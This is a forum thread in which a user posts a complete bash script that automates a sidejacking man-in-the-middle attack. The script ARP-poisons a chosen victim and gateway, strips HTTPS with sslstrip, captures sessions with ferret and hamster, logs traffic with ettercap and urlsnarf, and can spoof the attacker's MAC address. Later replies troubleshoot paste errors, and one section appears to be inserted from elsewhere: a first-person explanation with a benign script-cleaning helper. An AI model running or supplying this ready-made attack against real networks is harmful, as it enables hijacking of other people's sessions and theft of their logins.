Another script for sidejacking..
I know there are other scripts out there that do the same thing, but here is one I made. Perhaps someone else will find it useful. It basically uses hamster, ferret, sslstrip, ettercap, urlsnarf, and arpspoof, although adding your favourite program shouldn't be too difficult.
I tested it in Backtrack 4 R2. One thing to note is that the paths of ferret and hamster are hardcoded because it seems there is a problem with just executing them as is, at least on my R2 installation. You can customize it to suit your own needs, like the xterm window sizes and a few other things.
Code is here:
Gorara - sidejackssl.sh
And here:
Code:
#!/bin/bash
# sidejackssl.sh v0.1
# tested in backtrack 4 R2 environment, run as root.
# xterm used for window control
# arpspoof poisons a single victim and gateway
# ferret and hamster for sidejacking
# sslstrip for https
# ettercap for everything else
# urlsnarf to monitor visited urls
# firefox needs to be configured with a proxy of 127.0.0.1:1234
# url for hamster server is http://hamster
# by gorara

# a few variables (do not change)
m1="0"                      # missing file var m1
m2="0"                      # missing file var m2
m3="0"                      # missing file var m3
m4="0"                      # missing file var m4
quickclean="0"              # used for quick clean up
randmac="n"                 # default setting do not randomize MAC
hamsterfile="hamster.txt"   # hamster output file (you can't change it)
trap 'cleanup' SIGINT SIGTERM   # detect control-c

# a few more variables (change these if required)
# xterm window variables
x="0"                       # x offset value
y="0"                       # y offset value
width="120"                 # width value
height="7"                  # height value
yoffset="120"               # y offset
fgcolor="white"             # foreground color
bgcolor="black"             # background color

# style variables
warnstyle="[\e[01;38mw\e[00m]"    # warning msgs style
execstyle="[\e[01;32mx\e[00m]"    # execute msgs style
infostyle="[\e[01;34mi\e[00m]"    # informational msgs style
inputstyle="[\e[01;30m?\e[00m]"   # input msgs style

# file variables
sslstripfile="sslstrip.log"   # sslstrip output file name
snifffile="sniff-*"           # hamster sniff file wildcard
etterfile="etter.cap"         # ettercap output cap file
temp="/tmp"                   # temporary dir

function usage
{
    clear
    echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    echo ""
    echo "  -i interface   interface to use, ex. eth0, wlan0."
    echo "  -t target      the target IP address."
    echo "  -g gateway     the gateway IP address."
    echo "  -r             randomize your MAC address,"
    echo "                 only use for wired interfaces."
    echo "  -h             display this help screen."
    echo ""
    echo "  examples: "
    echo "  bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
    echo "  bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
    echo ""
    exit 0
}

function cleanup() {
    echo -e "\n$warnstyle control-c pressed! "
    # exit script if nothing has been modified
    if [[ "$quickclean" = "1" ]]; then
        echo -e "$infostyle nothing changed, all done!"
        exit 0
    fi
    echo -e "$infostyle cleaning up..."
    echo -e "$execstyle flushing iptables..."
    iptables -F
    iptables -t nat -F
    echo -e "$execstyle turning off IP forwarding..."
    echo "0" > /proc/sys/net/ipv4/ip_forward
    # change back MAC address to original one
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
        echo -e "$execstyle resetting MAC address..."
        echo -e "$infostyle original MAC is: $origmac"
        ifconfig "$interface" down
        ifconfig "$interface" hw ether "$origmac"
        ifconfig "$interface" up
        # $gw is quoted so an empty value is detected instead of passing "-z" alone to test
        if [ -z "$gw" ]; then
            echo -e "$warnstyle WARNING, you have no default gateway!"
        else
            route add default gw "$gw"
        fi
        rm -f "$temp/mac.orig" "$temp/gw.orig"
    fi
    echo -e "$execstyle cleaning up files..."
    echo -e "$infostyle temp directory: "
    # testing to see if files exist, if so display them...
    if [ -f "$temp/$sslstripfile" ]; then
        ls "$temp/$sslstripfile"
    else
        #echo -e "$warnstyle missing $sslstripfile"
        m1="1"
    fi
    if [ -f "$temp/$etterfile" ]; then
        ls "$temp/$etterfile"
    else
        #echo -e "$warnstyle missing $etterfile"
        m2="1"
    fi
    echo -e "$infostyle current directory: "
    # $snifffile is a wildcard: test each match, since [ -f ] breaks with more than one
    m3="1"
    for f in $snifffile; do
        if [ -f "$f" ]; then
            ls "$f"
            m3="0"
        fi
    done
    if [ -f "$hamsterfile" ]; then
        ls "$hamsterfile"
    else
        #echo -e "$warnstyle missing $hamsterfile"
        m4="1"
    fi
    # testing to see if there are any files at all
    if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
        # keep asking until y or n is given (stop on end of input too)
        while true; do
            echo -en "$infostyle delete file(s)? [y/n]: "
            read delete || break
            case "$delete" in
                y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
                n) echo -e "$warnstyle nothing deleted!"; break;;
                *) echo -e "$warnstyle wrong selection!";;
            esac
        done
        # delete files as requested
        if [[ "$delete_marker" = "y" ]]; then
            rm -f "$temp/$sslstripfile" "$temp/$etterfile" "$hamsterfile"
            for f in $snifffile; do
                [ -f "$f" ] && rm -f "$f"
            done
        fi
    else
        echo -e "$warnstyle nothing to delete!"
    fi
    echo -e "$infostyle all done!"
    exit 0
}

# start main program
if [ "$#" -eq 0 ]; then
    usage
fi
while [ "$#" -gt 0 ]
do
    case "$1" in
        -i) interface=$2; shift;;
        -r) randmac="y";;          # no value, so only the shift after esac applies
        -t) target=$2; shift;;
        -g) gateway=$2; shift;;
        -h) usage;;
        -*) usage; break;;
        *) break;;
    esac
    shift
done
# required parameters
if [[ -z $interface || -z $target || -z $gateway ]]; then
    usage
    exit 0
fi
clear
if [[ "$randmac" = "y" ]]; then
    mac="yes"
else
    mac="no"
fi
# set quick cleanup flag
quickclean="1"
echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
echo -e "$infostyle ctrl-c to abort at any time."
echo -e "$infostyle attack summary:"
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
if [[ "$randmac" = "y" ]]; then
    echo -e "$execstyle change of $interface MAC address requested."
    if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
        echo -e "$infostyle wireless device detected..."
        echo -e "$warnstyle can't change MAC address without taking wifi interface down"
        echo -e "$warnstyle do it manually before connecting to the AP."
        exit 0
    fi
    if [[ "$interface" = eth* ]]; then
        echo -e "$infostyle wired device detected..."
        echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
        echo -en "$inputstyle do you want to continue? [y/n]: "
        read answer
        if [[ "$answer" = "y" ]]; then
            echo -e "$infostyle proceeding..."
        else
            echo -e "$infostyle exiting..."
            exit 0
        fi
    fi
    origmac=$(ifconfig "$interface" | grep HWaddr | awk '{print $5}')
fi
# before this, ctrl-c will exit script without doing anything.
quickclean="0"
# use macchanger to randomize MAC address, etc.
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle randomizing MAC address..."
    # remember the default gateway, it is lost when the interface goes down
    gw=$(route -n | grep UG | awk '{print $2}')
    echo "$gw" > "$temp/gw.orig"
    ifconfig "$interface" down
    macchanger -r "$interface" > "$temp/mac.orig"
    ifconfig "$interface" up
    if [ -z "$gw" ]; then
        echo -e "$warnstyle WARNING, you have no default gateway!"
    else
        route add default gw "$gw"
    fi
    origmac=$(grep Current "$temp/mac.orig" | awk '{print $3}')
    fakemac=$(grep Faked "$temp/mac.orig" | awk '{print $3}')
    echo -e "$infostyle original MAC is: $origmac"
    echo -e "$infostyle faked MAC is: $fakemac"
fi
echo -e "$execstyle turning on IP Forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "$execstyle configuring iptables..."
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 1
echo -e "$execstyle starting hamster ... <logging to: $hamsterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
sleep 2
echo -e "$execstyle starting ferret ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
sleep 2
echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
sleep 2
echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
sleep 2
echo -e "$execstyle starting urlsnarf ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
sleep 2
echo -e "$infostyle trap is ready, now to direct traffic..."
echo -e "$execstyle ARP poisoning the target..."
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
sleep 1
echo -e "$infostyle run firefox and type http://hamster"
echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
# idle until ctrl-c fires the cleanup trap (sleep stops a busy loop if stdin closes)
for ((;;)) do
    read loop || sleep 1
    echo -en "$infostyle press ctrl-c to terminate!"
done
exit 0
Re: Another script for sidejacking..
Very slick. Will test tonight and provide feedback. You should start a google code page to track changes.
Re: Another script for sidejacking..
It's not working. I use R2 but I get an error when I run it:
sh sidejacking.sh
Re: Re: Another script for sidejacking..
Quote:
Originally Posted by
Xploit
It's not working. I use R2 but I get an error when I run it:
sh sidejacking.sh
And we are just suppose to know what happened if you don't give us the error message ?
Re: Re: Another script for sidejacking..
Quote:
Originally Posted by
Xploit
It's not working. I use R2 but I get an error when I run it:
sh sidejacking.sh
I am going to take a guess
you need to
chmod +x sidejacking.sh
(you need to make the script executable)
Re: Re: Another script for sidejacking..
Quote:
Originally Posted by
spudgunman
I am going to take a guess
you need to
chmod +x sidejacking.sh
(you need to make the script executable)
Actually, that's not really required. Simply copy-paste the code into a file, save it as sidejackssl.sh (or whatever you want), and run it as such:
Code:
bash sidejackssl.sh
It requires parameters, which the script will show you if you run it like this. You can change it to make it executable and run as ./sidejackssl.sh if you wish.
Re: Another script for sidejacking..
Quote:
root@bt:~# bash sidejackssl.sh
: command not founde 2:
: command not founde 14:
: command not founde 24:
: command not founde 26:
: command not founde 35:
: command not founde 41:
: command not founde 47:
'idejackssl.sh: line 49: syntax error near unexpected token `{
'idejackssl.sh: line 49: `{
I'm attempting to run this on BT4-R2. I get this error doing it both as "bash sidejackssl.sh" and "./sidejackssl.sh".
Just reporting, I'm sorry if the answer is simple and beyond my grasp.
Re: Another script for sidejacking..
Quote:
Originally Posted by
fromthestars
I'm attempting to run this on BT4-R2. I get this error doing it both as "bash sidejackssl.sh" and "./sidejackssl.sh".
Just reporting, I'm sorry if the answer is simple and beyond my grasp.
It looks like you may have copy-pasted the code from pastebin, if so you may have copied the line numbers too. Try pressing the RAW option in pastebin and copy the raw text, or copy the code from the initial post.
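Pasted scripts pick up two kinds of debris: the line numbers gorara mentions, and carriage returns from a CRLF copy. The second one is what produces error text overwritten from the start of the line (the `\r` in `$'\r': command not found` returns the cursor to column 0) and an "unexpected token `{'" on a line holding only `{`, as in the quoted output. The small sanitiser below is an added example, not part of the thread or gorara's script; `strip_paste_artifacts`, `sample_paste` and `syntax_ok` are names I chose, and the sample paste is constructed. It removes both artifacts and then asks bash to parse the result without running it.

```shell
#!/bin/sh
# Added example with hypothetical helper names: clean a script copied from a web paste
# and confirm bash accepts it, without executing anything.

# strip_paste_artifacts < pasted > clean
# 1. tr drops carriage returns (CRLF line endings)
# 2. sed drops a leading line number such as "12." or "12" followed by whitespace
strip_paste_artifacts() {
    tr -d '\r' | sed 's/^[[:space:]]*[0-9][0-9]*\.\{0,1\}[[:space:]]\{1,\}//'
}

# syntax_ok < script : 0 if bash can parse the script, non-zero otherwise (nothing is run)
syntax_ok() {
    bash -n 2>/dev/null
}

# sample_paste prints a constructed paste showing both artifacts: numbered lines and CRLF.
# The "{" on its own line mirrors the "function usage" / "{" layout that failed in the thread.
sample_paste() {
    printf '1. #!/bin/bash\r\n2. f()\r\n3. {\r\n4. echo hi\r\n5. }\r\n'
}

# Stand-alone run: the raw paste fails the parse, the cleaned copy passes.
if sample_paste | syntax_ok; then echo "raw paste: parses"; else echo "raw paste: syntax error"; fi
if sample_paste | strip_paste_artifacts | syntax_ok; then echo "cleaned: parses"; fi
```

For a saved file the workflow is `strip_paste_artifacts < pasted.sh > clean.sh && syntax_ok < clean.sh`. The number-stripping rule also trims a genuine line that starts with a number and a space, so diff the two files before running the cleaned copy.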
Re: Another script for sidejacking..
: command not founde 2:
: command not founde 14:
: command not founde 24:
: command not founde 26:
: command not founde 35:
: command not founde 41:
: command not founde 47:
'idejackssl.sh: line 49: syntax error near unexpected token `{
'idejackssl.sh: line 49: `{
Re: Another script for sidejacking..
Absolutely brilliant. It works like a bomb. I just need to test the BackTrack Linux - Penetration Testing Distribution proxy but rest of the stuff in the meantime.
Excellent work